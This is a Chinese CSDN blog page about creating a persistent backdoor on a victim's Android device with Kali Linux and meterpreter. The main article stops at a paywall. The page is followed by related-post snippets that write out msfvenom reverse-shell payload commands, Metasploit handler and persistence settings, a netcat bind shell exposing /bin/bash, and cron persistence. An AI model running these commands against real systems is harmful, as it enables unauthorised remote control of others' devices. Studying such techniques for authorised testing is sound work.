在Android中使用带有shell脚本的Kali Linux的持久性后门

最新推荐文章于 2025-04-08 08:00:00 发布
原创 最新推荐文章于 2025-04-08 08:00:00 发布 · 1k 阅读 · 12 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#android #linux #web安全 #网络安全

本内容主要介绍如何在使用msfvenom进行黑客攻击后,利用 Kali Linux 在 Android 设备中创建持久性后门。

可以使用上述任何一种方法来破解 android 设备,但是一旦获得了meterpreter会话,该会话就不是持久的,要使其持久,需要将一个 shell 脚本上传到/sdcard目录的任何位置。

在破解 Android 设备时,可以使用多种方法,但是一旦获得了meterpreter会话,该会话并不是持久的,需要将一个 shell 脚本上传到/sdcard目录的任何位置来实现持久性后门。由于受害者的设备一般没有 root 权限,因此不能在/etc/init.d目录下创建任何文件,权限太少。因此,我们需要使用另一种方法,即使用shell命令在/sdcard目录下上传一个后门,并执行脚本,该脚本会自动在该 Android 设备中创建持久性后门。

以下是需要遵循的步骤:

最低0.47元/天 解锁文章
夏瞳_
关注
windows/android后门的维持
qq_2411772106的博客
08-09 706
搭建环境:kali linux,MSF windons后门维持 // 先创建一个后门payload msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your ip> LPORT=4444 -f exe > /root/Desktop/windowsPayload.exe // 打开msf控制台,并完成相关设置 msfconsole use exploit/multi/handler set payload windows/meterpr
12.3、后渗透测试--持久化后门
无痕的博客
12-13 3965
metasploit后渗透测试--持久化后门
网络安全工程师教你:如何掌握Kali Linux的Metasploit
10-02
一、适合人群:本课程适合兴趣计算机与网络安全技术的学员观看学习二、课程目标:学习和掌握Kali Linux的Metasploit测试框架三、课程简介:1、Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。每一季度更新一次。由Offensive Security Ltd维护和资助。起先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的用于取证的Linux发行版 。 2、Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
Kali 中 Persistence后门使用
大方子
09-02 3726
这里我就用最经典的漏洞ms08_067进行演示   靶机:192.168.193.128 攻击机:192.168.193.135   这里我就省去ms08_067漏洞的使用过程,直接讲当ms08_067拿到shell之后的操作   这里我们已经拿到权限了   然后执行 run persistence -S -U -X -i 5 -p 446 -r 192.168.193.13...
利用Metasploit建立持续性会话后门
热门推荐
大方子
09-13 1万+
    环境Kali 1.0 IP:192.168.0.7windows 2003 IP:192.168.0.128本次文章 讲解Metasploit维持会话 建立服务后门首先先来生成一个 msf的exe后门     msf &gt; msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP -f exe -o /root/桌面/test....
从实践中学习Kali Linux渗透测试
cc123489ll的博客
06-19 1195
1.1.1 黑盒测试黑盒测试(Black-box Testing)也称为外部测试(ExternalTesting)。采用这种方式,测试者将从一个远程网络位置评估目标网络基础设施,并没有任何目标网络内部拓扑等相关信息。完全模拟真实网络环境中的外部攻击者,采用流行技术与工具有组织、有步骤的对目标组织进行渗透和入侵,揭示目标网络中一些已知或未知的安全漏洞,并评估这些漏洞能否被利用。优点:有利于挖掘出系统潜在的漏洞,以及脆弱环节和薄弱点。缺点:测试较为费时和费力,同时需要渗透测试者具备较高的技术能力。
kali linux 支持什么编程语言_渗透过程中可能要用到的Kali工具小总结
weixin_39576066的博客
10-24 3300
渗透过程中可能要用到的Kali工具小总结写在最前面最近在搞渗透的时候,发现过程中有一些kali工具还是很适合使用的所以写一个渗透过程中可能用到的kali渗透工具的小小总结写的不对 多多包涵 各位大佬轻喷 :DKali用得好 牢饭准管饱渗透不规范 亲人两行泪先来了解一下Kali(From Wikipdeia)Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Of...
Kali Linux:用永恒之蓝对 Windows 7 进行渗透并揭密勒索病毒攻击方法
GitChat
02-05 6263
提示:本文章内所有内容环境为自己搭建绝无违法内容,请不要利用其中的技术来做违法的事情。 声明:法律问题与本作者无关,请自觉遵守! 实施利用 Kali Linux 对 Windows7 SP1 进行永恒之蓝操作,所以操作将在虚拟机上完成。...
Kali Linux中高级Android漏洞利用技巧】:专家级破解指南
[【Kali Linux中高级Android漏洞利用技巧】:专家级破解指南](https://play.vidyard.com/QV1U8a2yzcxigw7VFnqKyg.jpg) # 1. Android漏洞利用基础知识 ## 1.1 漏洞利用概述 漏洞利用(Exploitation)是指利用软件中...
Android 14后台服务永久保活的技术方法
轻描时光
03-05 2465
到目前为止,我们已经创建了一个在Android应用程序中正常运行的后台服务。然而,在Android 8及以上版本中,由于后台服务受到一些限制,我们的服务可能会在一段时间后被杀死。通过以上步骤,我们可以实现在Android应用中创建一个永久保活的后台服务,以确保应用的功能和服务始终可用。为了在没有任何限制的情况下启动后台服务,我们需要在AndroidManifest.xml文件中定义一个持久化标志。在本篇博客中,我们将探讨如何创建一个在Android系统中不会被杀死的后台服务。第一步:创建一个后台服务。
jackpal.androidterm_70.apk
09-20
访问 Android 内置的 Linux 命令行 shell。 受欢迎的“Android Terminal Emulator”的一个新版本。同样的程序,新的名字。 主要功能 + 完整的 Linux 终端模拟器。 + 多窗口。 + 启动器快捷显示 + 支持 UTF-8 文本。(阿拉伯语、中文、希腊语、希伯来文、日语、韩文、俄语、泰文等。) + 全免费,无广告、无内置付费项目,无烦人的屏幕。 常见问题简述: + 如果遇到输入问题,请安装免费的“Hacker's Keyboard IME”。(尤其是对于三星或 HTC 设备。) + 该应用非游戏模拟器。 + 该应用不用于获取手机 root 权限或更改手机 IMEI 码。 + 需知道(或愿意学习)通过该应用使用命令行。 + 为了使用 Android 设备内置命令之外的命令,需安装一组命令行应用,比如 Busy Box 或 Debian chroot。 + 在版本低于 5.0 的 Android 系统上安装该应用,如果出现 -505 错误,表示其他应用正在使用同样的权限。为了成功安装本应用,请先卸载这些应用。(有用户反馈称,导致该问题的原因是 jrummy's Toolbox Pro。) 想要了解更多有关 Terminal Emulator for Android 的信息? 请加入 G+ 社区:#Android Terminal Emulator https://plus.google.com/u/0/communities/106164413936367578283 或查看文档 wiki: http://github.com/jackpal/Android-Terminal-Emulator/wiki 想要参加 Terminal Emulator for Android 的翻译或校对?请访问 https://github.com/jackpal/Android-Terminal-Emulator/wiki/Translating-to-Other-Languages for instructions。
Android应用植入后门 实现msf控制(附带所需工具和常见坑解决办法)
weixin_72849553的博客
12-21 5352
本人刚入msf坑不久,对于Android的渗透比较感兴趣,于是在网上寻找了很久资料,但是发现很多实现方法都会出现各种奇怪报错,于是我花了点时间,在外面的世界找解决方案,总算实现成功,故整理文章,供正在困惑和迷茫中挣扎的小伙伴们互相交流。下面进入正题:我们的思路是对一个安卓应用注入msf生成的payload后门,并实现内网范围或是外网范围内的持续控制,这样就会实现后门随正常应用启动,但不易被发现。文中会提供一些思路拓展,如果需要,我可以再展开来讲。
linux下留本地后门的两个方法
风信子的专栏
09-19 872
刚找xiaoyu要了文中所说的test文件,另外xiaoyu也发了我一个视频,一块放上来,下载地址:test、fstab后门视频.rar。test备份地址。作者:xi4oyu方法一:setuid的方法,其实8是很隐蔽。看看过程:[root@localdomain lib]# ls -l |grep ld-linuxlrwxrwxrwx 1 root root       9 20
[CM311-1A]-全网最全 Android 软件管理
燃吹 U 客帮
07-25 5757
如何使用命令安装卸载应用 应用安装与应用数据的存储位置不同 查看安装后的软件信息 查看某个应用的详细信息 如何使用命令启动应用程序 获取包名和 activity 路径 使用 am 的 start 命令启动 APP 使用命令启用应用 查看包的系统状态信息 查看系统功能与支持库信息 测试包与 APK 路径查询 pm 查询包的各种信息 搜索包 安装卸载包 清除应用数据 停用/禁用/启用 以及 恢复应用 隐藏与恢复应用 查看与更改默认安装位置.....................
后门持久化与隐匿技术分析:原理、机制与实战演化
syg6921008的博客
04-08 2237
后门技术的终极目标从来不是“上线”,而是“沉默存活”。从入口投送、模块部署、免杀策略、行为隐藏,到最终的通信逃避与长期管理,构建一个真正意义上难以察觉、难以清理、难以中断的持久控制体系,才是红队实战中的王道。多节点联动的链式触发多平台切换的逻辑状态机多信道可选的自适应 Beacon多阶段模块的自动化加载管理“看不见的不是不存在,是已经与环境融为一体。愿你所布控的每一条链路,都能悄无声息、久久为功。
Android 实现数据持久化功能的三种方式
KingToAce
01-30 3589
在应用开发中,不可避免要无时无刻地和数据打交道。 为什么要实现数据持久化? 比如:对象Student中有参数name、sex、age等,在应用开发中可以创建一个Student对象并给其参数赋值,该方式用于存储暂时\瞬时的数据,当退出程序或资源被回收后所保存的数据就消失了,因此当我们开发中需要保存用户登录的账号或密码、保存用户设置等重要信息时,数据持久化就可以帮助我们实现这一需求。
android 运行shell 脚本文件或shell命令
kk3087961的博客
01-11 8149
但是通过代码运行无法安装:Process p = Runtime.getRuntime().exec("pm install -r -t /data/local/tmp/test-debug.apk");3.执行脚本文件 Runtime.getRuntime().exec("sh /sdcard/lilei/test.sh");-----------------具体实现如下--------------------------------android 运行shell 脚本文件或shell命令。
android启动时,如何执行shell脚本
ConceptCon
10-27 2634
1、假如有如下shell脚本: ethcfg.sh    vendor\xyz\etc #!/system/busybox/bin/sh #song add for network dhcp netcfg eth0 up netcfg eth0 dhcp 2、在init.rc中把脚本定义成一个服务就可以了 init.rc: service ethcfg /s
kali metasploit 制作后门程序远程操控基本使用方法
qq_51685718的博客
12-03 4480
kali metasploit制作后门程序远程操控基本使用方法 1.后门程序的制作与加密 后门的实质就是木马 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.34.53 lport=10000 -f exe -o biyu.exe lhost后面加的是本机ip,lport后面加的是想要打开的端口号 执行后会在本地生成一个biyu.exe的文件 如果直接上传到win系统会被杀毒软件杀掉,我们可以用自己的电脑对其进行一个加壳操作。 下
如何在kali里创建一个后门
最新发布
07-06
创建后门程序通常涉及恶意行为,包括但不限于未经授权的系统访问、数据窃取或远程控制。此类活动违反法律和道德规范,特别是在未经目标系统所有者明确授权的情况下进行的操作。因此,在任何情况下,都不应滥用技术知识从事非法活动。 在合法范围内,例如安全研究、渗透测试或授权的红队演练中,可以通过模拟攻击来测试系统的安全性。Kali Linux 提供了多种工具用于此类合法用途,以下是一些相关技术说明: ### 使用 Metasploit 创建反弹 Shell Metasploit 是 Kali Linux 中的一个强大框架,可用于开发、测试和执行漏洞利用代码。通过它生成一个反弹 Shell 的示例步骤如下: 1. 启动 Metasploit 框架: ```bash msfconsole ``` 2. 生成一个基于 Meterpreter 的 payload: ```bash msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=你的IP LPORT=你的端口 -f elf > shell.elf ``` 这条命令会生成一个适用于 Linux x64 架构的反弹 Shell 可执行文件 `shell.elf`,当该文件在目标机器上运行时,会尝试连接回指定的 IP 和端口 [^3]。 3. 在本地监听连接: ```bash use exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp set LHOST 0.0.0.0 set LPORT 你的端口 exploit ``` 当目标运行 `shell.elf` 时,Meterpreter 会建立反向连接并提供对目标系统的远程控制能力。 ### 使用 Netcat 实现简易后门 Netcat(nc)是一个功能强大的网络调试工具,也可以用来创建简单的后门连接。例如,可以在目标系统上启动一个绑定 Shell 的服务: ```bash nc -lvp 4444 -e /bin/bash ``` 这将在目标机器上监听 4444 端口,并将接收到的连接重定向到 `/bin/bash`,从而允许远程用户执行命令 [^2]。 从攻击者的角度,可以使用以下命令连接到目标: ```bash nc 目标IP 4444 ``` ### 隐藏后门使用 Cron 定时任务持久化 为了确保后门在系统重启后仍然有效,可以将其添加为定时任务。例如,编辑 crontab 文件: ```bash crontab -e ``` 然后添加一行以实现每分钟运行一次后门脚本: ```bash * * * * * /path/to/backdoor.sh ``` ### 注意事项 - **合法性**:任何操作都必须在合法授权范围内进行,未经授权的入侵行为属于违法行为。 - **道德责任**:即使具备技术能力,也应遵循道德准则,不滥用技术手段损害他人利益。 - **安全意识**:了解这些技术有助于更好地防御潜在威胁,提升系统安全性。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值